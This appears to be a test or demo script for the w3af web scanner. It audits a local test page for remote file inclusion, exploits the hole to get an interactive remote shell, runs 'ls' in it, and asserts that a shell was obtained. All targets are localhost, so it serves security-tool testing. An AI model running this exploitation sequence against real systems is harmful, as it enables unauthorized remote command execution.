# This is the remoteFileInclude demo:

plugins
audit remoteFileInclude
audit config remoteFileInclude
set listenAddress 127.0.0.1
set usew3afSite False
back
output console,textFile
output config textFile
set fileName output-w3af.txt
set verbose True
back
back

target
set target http://localhost/w3af/audit/remoteFileInclusion/vulnerable.php?file=f0as9
back

start

assert len( kb.kb.getData('remoteFileInclude', 'remoteFileInclude') ) == 1

exploit
exploit config remoteFileIncludeShell
set listenAddress 127.0.0.1
back

exploit remoteFileIncludeShell
interact 0
ls
endInteraction

assert len( kb.kb.getData('remoteFileIncludeShell', 'shell') ) == 1

exit